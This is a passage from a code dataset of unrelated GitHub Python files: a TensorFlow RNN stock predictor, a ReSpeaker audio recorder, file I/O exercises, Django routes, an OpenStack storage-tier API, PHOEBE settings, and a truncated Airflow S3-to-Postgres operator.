\n\nThe loss/cost function is defined in add_loss_op, and is just \nthe mean-square error across stocks.\n\nPrediction and inference is done in predict_all()\nIn order to do prediction/inference, a model is loaded from a saved file\n(with graph defined in a Metagraph, and variables loaded via Saver).\n\nCurrently data is read in via feed_dict, which is super slow.\nApparently tf.Data is the new preferred simple framework for this.\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import fully_connected\nfrom tensorflow.contrib.rnn import MultiRNNCell, BasicRNNCell, GRUCell, LSTMCell,\\\n DropoutWrapper\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#to prevent creating huge logs.\nfrom IPython.display import clear_output\nimport time\n\nclass recurrent_NN(object):\n \"\"\"\n Make a multi-layer recurrent neural network for predicting next days\n stock data.\n\n \"\"\"\n def __init__(self,Nsteps,Ninputs,Nhidden,Noutputs,cell):\n \"\"\"\n Initialize model and build initial graph.\n\n Nsteps - number of time steps\n Ninputs - number of input stocks/features\n Nhidden - number of hidden degrees of freedom\n Noutputs - number of outputs at final time-step\n cell - type of recurrent cell to use (basic, LSTM, GRU)\n \"\"\"\n #number of outputs per input\n self.Noutputs=Noutputs\n self.Ninputs=Ninputs \n #number of steps\n self.Nsteps=Nsteps\n #number of dim on input\n self.cell_type=cell\n self.Nlayers=2\n self.Nhidden=Nhidden\n self.lr = 0.001\n self.keep_prob=0.5\n self.n_iter=200\n self.nprint=20\n self.is_training=True\n self.is_dropout=True\n #only grabbing a fraction of the data\n self.Nbatch=100\n #makes the tensor flow graph.\n self.build()\n\n def build(self):\n \"\"\"Creates essential components for graph, and \n adds variables to instance. \n \"\"\"\n tf.get_default_graph()\n tf.reset_default_graph() \n self.add_placeholders()\n self.pred = self.add_prediction_op()\n self.loss = self.add_loss_op(self.pred)\n self.train_op = self.add_training_op(self.loss)\n\n def add_placeholders(self):\n \"\"\"Adds input, output placeholders to graph. \n Note that these are python object attributes.\n \"\"\"\n #load in the training examples, and their labels\n #inputs: Nobs, with n_steps, and n_inputs per step\n self.X = tf.placeholder(tf.float32,[None,self.Nsteps,self.Ninputs],name='X')\n #Outputs: n_outputs we want to predict in the future.\n self.y = tf.placeholder(tf.float32,[None,self.Noutputs],name='y')\n\n def create_feed_dict(self,inputs_batch, labels_batch=None):\n \"\"\"Make a feed_dict from inputs, labels as inputs for \n graph.\n Args:\n inputs_batch - batch of input data\n label_batch - batch of output labels. 
(Can be none for prediction)\n Return:\n Feed_dict - the mapping from data to placeholders.\n \"\"\"\n feed_dict={self.X:inputs_batch}\n if labels_batch is not None:\n feed_dict[self.y]=labels_batch\n return feed_dict\n\n def make_RNN_cell(self,Nneurons,fn=tf.nn.relu):\n \"\"\"\n Returns a new cell (for deep recurrent networks), with Nneurons,\n and activation function fn.\n \"\"\"\n #Make cell type\n if self.cell_type=='basic':\n cell=BasicRNNCell(num_units=Nneurons,activation=fn)\n elif self.cell_type=='LSTM':\n cell=LSTMCell(num_units=Nneurons,activation=fn)\n elif self.cell_type=='GRU':\n cell=GRUCell(num_units=Nneurons,activation=fn)\n #only include dropout when training\n if (self.is_training & self.is_dropout):\n cell=DropoutWrapper(cell,input_keep_prob=self.keep_prob,\n variational_recurrent=True,\n input_size=Nneurons,\n dtype=tf.float32)\n return cell\n \n def add_prediction_op(self):\n \"\"\"The core model to the graph, that\n transforms the inputs into outputs.\n Implements deep neural network with relu activation.\n \"\"\"\n ##Tries to make projection to reduce dim from Ninputs to Nhidden\n stacked_inputs=tf.reshape(self.X,[-1,self.Ninputs])\n stacked_inputs=fully_connected(stacked_inputs,self.Nhidden, activation_fn=None)\n inputs_reduced= tf.reshape(stacked_inputs,[-1,self.Nsteps,self.Nhidden])\n #Make multiple cells. Note that using [cell]*n_layers did not work. This just made a copy pointing at the SAME cell in memory.\n #That led to problems with training. \n #But calling a function that returns a cell avoids that.\n cell_list=[]\n for i in range(self.Nlayers):\n cell_list.append(self.make_RNN_cell(self.Nhidden,tf.nn.leaky_relu))\n multi_cell=tf.contrib.rnn.MultiRNNCell(cell_list,state_is_tuple=True)\n rnn_outputs,states=tf.nn.dynamic_rnn(multi_cell,inputs_reduced,dtype=tf.float32)\n #use states (like CNN) since need final output state.\n #this maps the number of hidden units back to a different number.\n print(states)\n outputs = fully_connected(states,self.Noutputs,activation_fn=None)\n outputs=outputs[0]\n print(outputs)\n return outputs\n\n def add_loss_op(self,outputs):\n \"\"\"Add ops for loss to graph.\n Uses mean-square error as the loss. 
(Nice, differentiable)\n \"\"\"\n loss = tf.reduce_mean(tf.square(outputs-self.y)) \n return loss\n\n def add_training_op(self,loss):\n \"\"\"Create op for optimizing loss function.\n Can be passed to sess.run() to train the model.\n Return \n \"\"\"\n optimizer=tf.train.AdamOptimizer(learning_rate=self.lr)\n training_op=optimizer.minimize(loss)\n return training_op\n\n def train_on_batch(self, sess, inputs_batch, labels_batch):\n \"\"\"Perform one step of gradient descent on the provided batch of data.\n\n Args:\n sess: current tensorflow session\n input_batch: np.ndarray of shape (Nbatch, Nfeatures)\n labels_batch: np.ndarray of shape (Nbatch, 1)\n Returns:\n loss: loss over the batch (a scalar)\n \"\"\"\n feed = self.create_feed_dict(inputs_batch, labels_batch=labels_batch)\n _, loss = sess.run([self.train_op, self.loss], feed_dict=feed)\n return loss\n\n def predict_on_batch(self, sess, inputs_batch):\n \"\"\"Make predictions for the provided batch of data\n\n Args:\n sess: current tensorflow session\n input_batch: input data np.ndarray of shape (Nbatch, Nstep,Nfeatures)\n Returns:\n predictions: np.ndarray of shape (Nbatch, Nout,Nfeatures,)\n \"\"\"\n feed = self.create_feed_dict(inputs_batch)\n predictions = sess.run(self.pred, feed_dict=feed)\n\n return predictions\n\n\n # #Should use tf.Data as described in seq2seq.\n #Much faster than feed_dict according to TF docs\n \n def get_random_batch(self,X,y):\n \"\"\"get_random_batch(X,y) \n Gets multiple random samples for the data.\n Makes list of returned entries.\n Then combines together with 'stack' function at the end.\n Currently selected the next days change in stock price.\n\n X - matrix of inputs, (Nt, Ninputs)\n Y - matrix of desired outputs (Nt,Noutputs)\n\n Outputs:\n X_batch - random subset of inputs shape (Nbatch,Nsteps,Ninputs) \n y_batch - corresponding subset of outputs (Nbatch,Nsteps)\n \"\"\"\n Nt,Nin = X.shape\n x_list=[]\n y_list=[]\n for i in range(self.Nbatch):\n n0=int(np.random.random()*(Nt-self.Nsteps-1))\n n1 = n0+self.Nsteps\n x_sub = X[n0:n1]\n y_sub = y[n1]\n x_list.append(x_sub)\n y_list.append(y_sub)\n x_batch=np.stack(x_list,axis=0)\n y_batch=np.stack(y_list,axis=0)\n return x_batch,y_batch\n\n # def get_combined_data(self, ):\n # \"\"\"\n # Try to use the dataset example (following seq2seq tutorial on Tensorflow)\n # Tensorflow Does all of the splitting, lookup. 
\n # \"\"\"\n # # a list of strings.\n # text_batch = tf.placeholder(tf.string, shape=(self.Nbatch,))\n # dataset = tf.data.Dataset.from_tensor_slices(text_batch)\n\n # label_dataset=tf.Dataset(labels)\n \n # #Direct from TF\n # dataset = dataset.map(lambda string: tf.string_split([string]).values)\n # # dataset = dataset.map(lambda words: (words, tf.size(words)))\n # #dataset = dataset.map(lambda words, size: (table.lookup(words), size))\n # dataset=dataset.map(lambda words,size: sentence_lookup(words), tf.size(words))\n\n # #zip together\n # dataset_total=tf.data.Dataset.zip((dataset,label_dataset))\n\n # dataset=\n \n def train_graph(self,Xi,yi,save_name=None):\n \"\"\"train_graph\n Runs the deep NN on the reduced term-frequency matrix.\n \"\"\"\n self.is_training=True\n #save model and graph\n saver=tf.train.Saver()\n init=tf.global_variables_initializer()\n loss_tot=np.zeros(int(self.n_iter/self.nprint+1))\n #Try adding everything by name to a collection\n tf.add_to_collection('X',self.X)\n tf.add_to_collection('y',self.y)\n tf.add_to_collection('loss',self.loss)\n tf.add_to_collection('pred',self.pred)\n tf.add_to_collection('train',self.train_op)\n \n with tf.Session() as sess:\n init.run()\n # if (save_name!=None):\n # saver.save(sess,save_name)\n t0=time.time()\n #Use Writer for tensorboard.\n writer=tf.summary.FileWriter(\"logdir-train\",sess.graph) \n for iteration in range(self.n_iter+1):\n #select random starting point.\n X_batch,y_batch=self.get_random_batch(Xi,yi)\n current_loss=self.train_on_batch(sess, X_batch, y_batch)\n t2_b=time.time()\n if (iteration)%self.nprint ==0:\n clear_output(wait=True)\n print('iter #{}. Current MSE:{}'.format(iteration,current_loss))\n print('Total Time taken:{}'.format(t2_b-t0))\n print('\\n')\n #save the weights\n if (save_name != None):\n saver.save(sess,save_name,global_step=iteration,\n write_meta_graph=True)\n #manual logging of loss \n loss_tot[int(iteration/self.nprint)]=current_loss\n writer.close()\n #Manual plotting of loss. Writer/Tensorboard supersedes this .\n plt.figure() \n plt.plot(loss_tot)\n plt.ylabel('Error')\n plt.xlabel('Iterations x{}'.format(self.nprint))\n plt.show()\n \n\n def predict_all(self,model_name,num,input_data,reset=False):\n \"\"\"network_predict\n Load a saved Neural network, and predict the output labels\n based on input_data. Predicts the whole sequence, using\n the batching to process the data in sequence. \n \n Input: model_name - string name to where model/variables are saved.\n input_data - transformed data of shape (Nobs,Nfeature).\n\n Output nn_pred_reduced - vector of predicted labels.\n \"\"\"\n if (reset):\n tf.reset_default_graph() \n self.is_training=False\n full_model_name=model_name+'-'+str(num)\n with tf.Session() as sess:\n saver=tf.train.import_meta_graph(full_model_name+'.meta')\n #restore graph structure (note: stored under the 'train' collection key above)\n self.X=tf.get_collection('X')[0]\n self.y=tf.get_collection('y')[0]\n self.pred=tf.get_collection('pred')[0]\n self.train_op=tf.get_collection('train')[0]\n self.loss=tf.get_collection('loss')[0]\n #restores weights etc.\n saver.restore(sess,full_model_name)\n Nin=input_data.shape[0]\n if (Nin < self.Nbatch):\n print('Number of inputs < Number of batch expected')\n print('Padding with zeros')\n input_data=np.append(input_data,\n np.zeros((self.Nbatch-Nin,self.Noutputs)))\n i0=0\n i1=self.Nbatch\n nn_pred_total=np.zeros((Nin,self.Noutputs))\n while (i1 < Nin-self.Nsteps):\n print(i0,i1)\n #now treat each time, as another element in a batch.\n #(i.e. 
march through dataset predicting, instead of randomly selecting for training)\n X_batch=np.zeros((self.Nbatch,self.Nsteps,self.Ninputs))\n for i in range(self.Nbatch):\n X_batch[i,:,:]=input_data[(i0+i):(i0+i+self.Nsteps),:]\n nn_pred=self.predict_on_batch(sess,X_batch)\n sl=slice(self.Nsteps+i0,self.Nsteps+i1)\n nn_pred_total[sl]=nn_pred\n i0=i1\n i1+=self.Nbatch\n #last iter: do remaining operations. \n Nleft=Nin-i0-self.Nsteps\n X_batch=np.zeros((Nleft,self.Nsteps,self.Ninputs))\n for i in range(Nleft):\n X_batch[i,:,:]=input_data[(i0+i):(i0+i+self.Nsteps),:]\n nn_pred=self.predict_on_batch(sess,X_batch)\n nn_pred_total[-Nleft:]=nn_pred\n #nn_pred_reduced=np.round(nn_pred_total).astype(bool)\n return nn_pred_total\n\n \n def restore_model(self,sess,model_name,num):\n \"\"\"Attempts to reset both TF graph, and \n RNN stored variables/structure.\n \"\"\"\n saver=tf.train.import_meta_graph(model_name+'.meta')\n #restore graph structure\n self.X=tf.get_collection('X')[0]\n self.y=tf.get_collection('y')[0]\n self.pred=tf.get_collection('pred')[0]\n self.train=tf.get_collection('train')[0]\n self.loss=tf.get_collection('loss')[0]\n #restores weights etc.\n saver.restore(sess,model_name+'-'+str(num))\n \n","repo_name":"jmackrory/PDX_finance","sub_path":"neural_networks/recurrent_network.py","file_name":"recurrent_network.py","file_ext":"py","file_size_in_byte":15558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16111708485","text":"import pyaudio\nimport wave\nimport numpy as np\nimport os\nimport time\nimport scipy.io.wavfile as wav\nimport Gvoicesource\nimport shutil\nfrom multiprocessing import Process, Queue\nimport time\n\nRESPEAKER_RATE = 44100\nRESPEAKER_CHANNELS = 8 \nRESPEAKER_WIDTH = 2\n# run getDeviceInfo.py to get index\nRESPEAKER_INDEX = 2 # refer to input device id\nCHUNK = 1024\nRECORD_SECONDS = 1\nqcount = 0\n\n#\ndef save_record(WAVE_FILENAME, frames, p):\n wf = wave.open(WAVE_FILENAME, 'wb')\n # set how many channels you extract\n wf.setnchannels(1)\n wf.setsampwidth(p.get_sample_size(p.get_format_from_width(RESPEAKER_WIDTH)))\n wf.setframerate(RESPEAKER_RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n rate, mic = wav.read(WAVE_FILENAME)\n\n\ndef recording(p, WAVE_OUTPUT_FOLDNAME):\n stream = p.open(\n rate=RESPEAKER_RATE,\n format=p.get_format_from_width(RESPEAKER_WIDTH),\n channels=RESPEAKER_CHANNELS,\n input=True,\n input_device_index=RESPEAKER_INDEX,)\n\n frames1 = []\n frames2 = []\n frames3 = []\n frames4 = []\n\n for i in range(0, int(RESPEAKER_RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n # extract channel 0 data from 8 channels, if you want to extract channel 1, please change to [1::8]\n # 4 channel for microphone, 2 channels for the playback, 2 channels are not used\n mic1 = np.fromstring(data, dtype=np.int16)[0::8]\n frames1.append(mic1.tostring())\n mic2 = np.fromstring(data, dtype=np.int16)[1::8]\n frames2.append(mic2.tostring())\n mic3 = np.fromstring(data, dtype=np.int16)[2::8]\n frames3.append(mic3.tostring())\n mic4 = np.fromstring(data, dtype=np.int16)[3::8]\n frames4.append(mic4.tostring())\n\n stream.stop_stream()\n stream.close()\n\n os.mkdir(WAVE_OUTPUT_FOLDNAME)\n\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic1.wav\", frames1, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic2.wav\", frames2, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic3.wav\", frames3, p)\n save_record(WAVE_OUTPUT_FOLDNAME+\"//mic4.wav\", frames4, p)\n\n\ndef recording_fetch(p, max_count, q):\n global 
qcount\n while qcount < max_count:\n recording(p, 'record' + str(qcount))\n qcount += 1\n q.put(qcount-1)\n\n\ndef detecting(WAVE_OUTPUT_FOLDNAME):\n quad, angle, distance = Gvoicesource.get_voice_source(WAVE_OUTPUT_FOLDNAME+\"//mic1.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic2.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic3.wav\", WAVE_OUTPUT_FOLDNAME+\"//mic4.wav\")\n \n if quad is not None:\n angle = round(angle, 3)\n distance = round(distance, 3)\n print(\"Quadrant \" + str(quad), str(angle) + '°', str(distance)+'cm')\n else:\n print(\"Failed to detect...\")\n\n\nif __name__ == \"__main__\":\n p = pyaudio.PyAudio()\n q = Queue()\n max_count = 40\n recorder = Process(target=recording_fetch, args=(p, max_count, q))\n recorder.start()\n\n while True:\n i = q.get()\n if i >= max_count:\n recorder.join()\n break\n else:\n detecting('record' + str(i))\n shutil.rmtree('record' + str(i))\n\n p.terminate()\n exit()\n","repo_name":"cxyznj/VoiceDetector","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4581235903","text":"import codecs\n\ndef copy(file, new_file):\n with open(file, encoding='utf8') as file:\n data = file.read()\n with open(new_file, 'w') as n:\n n.write(data)\n\n\n# copy('story.txt','story_copy.txt')\n\ndef copy_and_reverse(filename, new_file):\n with open(filename, encoding='utf8') as file:\n data = file.read()\n\n with open(new_file, 'w') as f:\n f.write(data[::-1])\n\n\n# print(copy_and_reverse('story.txt','story_copy.txt'))\ndef statistics(filename):\n with open(filename, encoding='utf8') as file:\n # s = file.readlines()\n # print(len(s))\n data = file.read()\n line = data.split(\"\\n\")\n word = data.split()\n return {'lines': len(line), 'words': len(word), 'characters': len(data)}\n\n# print(statistics('story.txt'))\n\ndef find_and_replace(filename, word, new_word):\n with open(filename, 'r+', encoding ='utf8') as file:\n data = file.read()\n new_data = data.replace(word, new_word)\n file.seek(0)\n file.write(new_data)\n file.truncate()\n\nfind_and_replace('story.txt', 'Alice', 'Colt')\nprint(\"Hello\")","repo_name":"Ing140943/FileIO","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"32014501690","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\n\turl(r'^search$', views.search, name='search'),\n\n\t# url(r'^get_name$', views.get_name, name='get_name'),\n\n\t# url(r'^(?P[0-9]+)/$', views.detail, name='detail')\n\turl(r'^searchQuery/(?P[a-zA-Z0-9\\s]*$)', views.searchQuery, name='searchQuery'),\n\n\turl(r'^(?P[0-9]+)/vote/$', views.vote, name='vote')\n]\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()","repo_name":"tschmoek/BookSummarySearch","sub_path":"Search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70472050474","text":"import six\nimport webob\nfrom webob import exc\nfrom oslo.config import cfg\nfrom sds.common import wsgi\nfrom sds.api import xmlutil\nfrom sds.common import exception\nfrom sds.common import rpc\nfrom sds.openstack.common import log as logging\nfrom sds.discover import storage_backends\nfrom sds.discover import storage_tiers\nfrom sds.api.v1.views import tiers as views_tiers\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\ndef make_backendtype(elem):\n elem.set('id')\n elem.set('name')\n #capability_specs = xmlutil.make_flat_dict('capability_specs', selector='capability_specs')\n #elem.append(capability_specs)\n\n\nclass StorageBackendTierTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('storage_tier', selector='storage_tier')\n make_backendtype(root)\n return xmlutil.MasterTemplate(root, 1)\n\n\nclass StorageBackendTiersTemplate(xmlutil.TemplateBuilder):\n def construct(self):\n root = xmlutil.TemplateElement('storage_tiers')\n elem = xmlutil.SubTemplateElement(root, 'storage_tier',\n selector='storage_tiers')\n make_backendtype(elem)\n return xmlutil.MasterTemplate(root, 1)\n\n\nclass StorageBackendTiersController(wsgi.Controller):\n \"\"\"The storage backends API controller for the OpenStack API.\"\"\"\n\n _view_builder_class = views_tiers.ViewBuilder\n\n def _notify_storage_tier_error(self, context, method, payload):\n rpc.get_notifier('storageTier').error(context, method, payload)\n\n def _get_tiers(self, req, is_detail):\n \"\"\"Returns the list of storage backends.\"\"\"\n context = req.environ['sds.context']\n params = req.params.copy()\n\n search_opts = dict()\n if params:\n if params.get('id'):\n search_opts['id'] = params.get('id')\n if params.get('name'):\n search_opts['name'] = params.get('name')\n if params.get('storage_backend_id'):\n search_opts['storage_backend_id'] = params.get('storage_backend_id')\n if params.get('capability_specs_id'):\n search_opts['capability_specs_id'] = params.get('capability_specs_id')\n\n try:\n return storage_tiers.get_all_tiers(context, search_opts=search_opts, is_detail=is_detail)\n except exception.StorageTierNotFound:\n if len(search_opts) > 0: # raise exception only when specific tier info is requested\n raise\n\n return list()\n\n\n def _check_key_names(self, keys):\n if not common.validate_key_names(keys):\n expl = _('Key names can only contain alphanumeric characters, '\n 'underscores, periods, colons and hyphens.')\n\n raise webob.exc.HTTPBadRequest(explanation=expl)\n\n @wsgi.serializers(xml=StorageBackendTiersTemplate)\n def index(self, req):\n \"\"\"Returns the list of storage backends.\"\"\"\n _storage_tiers = self._get_tiers(req, is_detail = False)\n return self._view_builder.summary_list(req, _storage_tiers)\n\n 
@wsgi.serializers(xml=StorageBackendTiersTemplate)\n def detail(self, req):\n \"\"\"Returns the list of storage backends.\"\"\"\n _storage_tiers = self._get_tiers(req, is_detail = True)\n return self._view_builder.detail_list(req, _storage_tiers)\n\n @wsgi.serializers(xml=StorageBackendTierTemplate)\n def show(self, req, id):\n \"\"\"Return a single storage backend item.\"\"\"\n context = req.environ['sds.context']\n\n try:\n storage_tier = storage_tiers.get_tier_by_id(context, id, is_detail = True)\n except exception.NotFound as err:\n LOG.warn(\"Exception %s\" % err)\n raise exc.HTTPNotFound()\n\n return self._view_builder.show(req, storage_tier)\n\n @wsgi.action(\"create\")\n @wsgi.serializers(xml=StorageBackendTiersTemplate)\n def create(self, req, body=None):\n context = req.environ['sds.context']\n\n if not self.is_valid_body(body, 'storage_tier'):\n raise webob.exc.HTTPBadRequest()\n\n tier_ref = body['storage_tier']\n tier_name = tier_ref.get('tier_name', None)\n backend_name = tier_ref.get('backend_name', None)\n \n if tier_name is None or tier_name == \"\":\n raise webob.exc.HTTPBadRequest()\n\n if backend_name is None or backend_name == \"\":\n raise webob.exc.HTTPBadRequest()\n\n try:\n result = storage_tiers.create_tier(context, tier_name, backend_name, tier_ref.get('capability_specs'))\n _backend_tier_info = storage_tiers.get_tier_by_id(context, result['id'])\n\n notifier_info = dict(tier_info=_backend_tier_info)\n notifier = rpc.get_notifier('storageBackendTiers')\n notifier.info(context, 'storage_backend_tiers.create',\n notifier_info)\n\n except exception.StorageTierExists as err:\n notifier_err = dict(tier_info=tier_ref, error_message=err)\n self._notify_storage_tier_error(context,\n 'storage_tier.create',\n notifier_err)\n\n raise webob.exc.HTTPConflict(explanation=six.text_type(err))\n except Exception as err:\n LOG.warn(\"Exception: %s\" % err)\n notifier_err = dict(tier_info=tier_ref, error_message=err)\n self._notify_storage_tier_error(context,\n 'storage_tier.create',\n notifier_err)\n raise webob.exc.HTTPNotFound()\n\n return self._view_builder.show(req, _backend_tier_info)\n\n @wsgi.action(\"delete\")\n def delete(self, req, id):\n \"\"\"Deletes an existing storage tier.\"\"\"\n context = req.environ['sds.context']\n\n try:\n storage_tiers.destroy_tier_by_id(context, id)\n except Exception as error:\n LOG.warn(\"Exception: %s\" % error)\n raise webob.exc.HTTPNotFound(explanation=error.message)\n\n notifier_info = dict(id=id)\n notifier = rpc.get_notifier('storageBackendTiers')\n notifier.info(context,\n 'storage_backend_tiers.delete',\n notifier_info)\n return webob.Response(status_int=202)\n\n\ndef create_resource():\n return wsgi.Resource(StorageBackendTiersController())\n","repo_name":"opensds/proposals","sub_path":"intel-sds-proto/sds/sds/api/v1/tiers.py","file_name":"tiers.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"23776562211","text":"'''\n1584. Min Cost to Connect All Points\nMedium\n\nYou are given an array points representing integer coordinates of some points on a 2D-plane, where points[i] = [xi, yi].\n\nThe cost of connecting two points [xi, yi] and [xj, yj] is the manhattan distance between them: |xi - xj| + |yi - yj|, where |val| denotes the absolute value of val.\n\nReturn the minimum cost to make all points connected. 
All points are connected if there is exactly one simple path between any two points.\n\nExample 1:\n\nInput: points = [[0,0],[2,2],[3,10],[5,2],[7,0]]\nOutput: 20\nExplanation: \nWe can connect the points as shown above to get the minimum cost of 20.\nNotice that there is a unique path between every pair of points.\n\nExample 2:\n\nInput: points = [[3,12],[-2,5],[-4,1]]\nOutput: 18\n\nConstraints:\n\n1 <= points.length <= 1000\n-10^6 <= xi, yi <= 10^6\nAll pairs (xi, yi) are distinct.\n'''\nclass Solution:\n def minCostConnectPoints(self, points: List[List[int]]) -> int:\n \n class UF:\n def __init__(self, n):\n self.root = [i for i in range(n)]\n self.rank = [1]*n\n \n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n \n def union(self, x, y):\n px, py = self.find(x), self.find(y)\n if px == py:\n return False\n if self.rank[px] > self.rank[py]:\n self.root[py] = self.root[px]\n else:\n self.root[px] = self.root[py]\n if self.rank[px] == self.rank[py]:\n self.rank[py] += 1\n return True\n \n dist_list = []\n for i in range(len(points)):\n x1, y1 = points[i]\n for j in range(i+1,len(points)):\n x2, y2 = points[j]\n dist_list.append((abs(x2-x1)+abs(y2-y1), i, j))\n\n dist_list.sort()\n uf = UF(len(points))\n ans = 0\n for dist, i, j in dist_list:\n if uf.union(i, j):\n ans += dist\n return ans","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2023/09. September/15.minCostConnectPoints.py","file_name":"15.minCostConnectPoints.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4702772797","text":"\nfrom phoebe.parameters import *\nfrom phoebe import conf, __version__\n\n### NOTE: if creating new parameters, add to the _forbidden_labels list in parameters.py\n\ndef settings(**kwargs):\n \"\"\"\n Create a <phoebe.parameters.ParameterSet> for bundle-level settings.\n\n Generally, this will automatically be added to a newly initialized\n <phoebe.frontend.bundle.Bundle>.\n\n Arguments\n ----------\n * `dict_filter` (dictionary, optional, default={}): filter to use when using\n dictionary access in the bundle.\n * `dict_set_all` (bool, optional, default=False): whether to set all values\n for dictionary access that returns more than 1 result.\n * `run_checks_compute` (list or string, optional, default='*'): Compute\n options to use when calling run_checks/run_checks_compute or within\n interactive checks.\n * `run_checks_solver` (list or string, optional, default='*'): Solver\n options to use when calling run_checks/run_checks_solver or within\n interactive checks.\n * `run_checks_solution` (list or string, optional, default='*'): Solutions\n to use when calling run_checks/run_checks_solution or within\n interactive checks.\n * `run_checks_figure` (list or string, optional, default='*'): Figures\n to use when calling run_checks/run_checks_figure or within\n interactive checks.\n * `run_checks_server` (list or string, optional, default='*'): Servers\n to use when calling run_checks/run_checks_server or within\n interactive checks.\n * `auto_add_figure` (bool, optional, default=False): Whether to automatically\n add figure parameters when a dataset is added with a new dataset type,\n or a solution is added.\n * `auto_remove_figure` (bool, optional, default=False): Whether to\n automatically remove figure parameters when the referenced\n dataset/solution are removed.\n * `web_client` (bool, optional, default=False): Whether to default to using\n the web-client over a locally 
installed desktop-client when opening the\n UI from the desktop client.\n * `web_client_url` (string, optional, default='ui.phoebe-project.org'):\n Default location of web-client. Will only be used if web_client is True.\n\n Returns\n --------\n * (<phoebe.parameters.ParameterSet>): ParameterSet of all newly created\n <phoebe.parameters.Parameter> objects.\n \"\"\"\n\n params = []\n\n params += [StringParameter(qualifier='phoebe_version', value=kwargs.get('phoebe_version', __version__), advanced=True, readonly=True, description='Version of PHOEBE')]\n params += [DictParameter(qualifier='dict_filter', value=kwargs.get('dict_filter', {}), advanced=True, description='Filters to use when using dictionary access')]\n params += [BoolParameter(qualifier='dict_set_all', value=kwargs.get('dict_set_all', False), advanced=True, description='Whether to set all values for dictionary access that returns more than 1 result')]\n\n params += [SelectParameter(qualifier='run_checks_compute', value=kwargs.get('run_checks_compute', '*'), choices=[], advanced=False, description='Compute options to use when calling run_checks/run_checks_compute or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_solver', value=kwargs.get('run_checks_solver', '*'), choices=[], advanced=False, description='Solver options to use when calling run_checks/run_checks_solver or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_solution', value=kwargs.get('run_checks_solution', '*'), choices=[], advanced=False, description='Solutions to use when calling run_checks/run_checks_solution or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_figure', value=kwargs.get('run_checks_figure', '*'), choices=[], advanced=False, description='Figures to use when calling run_checks/run_checks_figure or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_server', value=kwargs.get('run_checks_server', '*'), choices=[], advanced=False, description='Servers to use when calling run_checks/run_checks_server or within interactive checks.')]\n\n params += [BoolParameter(qualifier='auto_add_figure', value=kwargs.get('auto_add_figure', True), description='Whether to automatically add figure parameters when a dataset is added with a new dataset type, or a solution is added.')]\n params += [BoolParameter(qualifier='auto_remove_figure', value=kwargs.get('auto_remove_figure', True), description='Whether to automatically remove figure parameters when the referenced dataset/solution are removed.')]\n\n params += [BoolParameter(qualifier='web_client', value=kwargs.get('web_client', False), advanced=True, description='Whether to default to using the web-client over a locally installed desktop-client when opening the UI from the desktop client.')]\n params += [StringParameter(qualifier='web_client_url', value=kwargs.get('web_client_url', 'ui.phoebe-project.org'), advanced=True, description='Default location of web-client. 
Will only be used if web_client is True.')]\n\n return ParameterSet(params)\n","repo_name":"phoebe-project/phoebe2","sub_path":"phoebe/parameters/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"35610512515","text":"from airflow.models import BaseOperator\r\nfrom airflow.utils.decorators import apply_defaults\r\nfrom airflow.providers.amazon.aws.hooks.s3 import S3Hook\r\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\r\n\r\n\r\nclass S3ToPostgresOperator(BaseOperator):\r\n\r\n template_fields = ['s3_bucket_key', 'postgres_table']\r\n\r\n @apply_defaults\r\n def __init__(\r\n self,\r\n airflow_s3_connection,\r\n s3_bucket_name,\r\n s3_bucket_key,\r\n airflow_postgres_connection,\r\n postgres_table,\r\n postgres_columns_list,\r\n *args, **kwargs\r\n ):\r\n\r\n super().__init__(*args, **kwargs)\r\n self.airflow_s3_connection = airflow_s3_connection \r\n self.s3_bucket_name = s3_bucket_name\r\n self.s3_bucket_key = s3_bucket_key\r\n self.airflow_postgres_connection = airflow_postgres_connection\r\n self.postgres_table = postgres_table\r\n self.postgres_columns_list = postgres_columns_list\r\n\r\n def execute(self, context):\r\n \r\n # Download file from S3\r\n s3_hook = S3Hook(self.airflow_s3_connection)\r\n tmp_filepath = s3_hook.download_file(key = self.s3_bucket_key, bucket_name = self.s3_bucket_name)\r\n self.log.info(f'File {self.s3_bucket_key} downloaded from S3.')\r\n\r\n with open(tmp_filepath, 'r') as tmp_file:\r\n\r\n # Copy data to postgres\r\n postgres_hook = PostgresHook(self.airflow_postgres_connection)\r\n self.log.info(f'Connection to Postgres 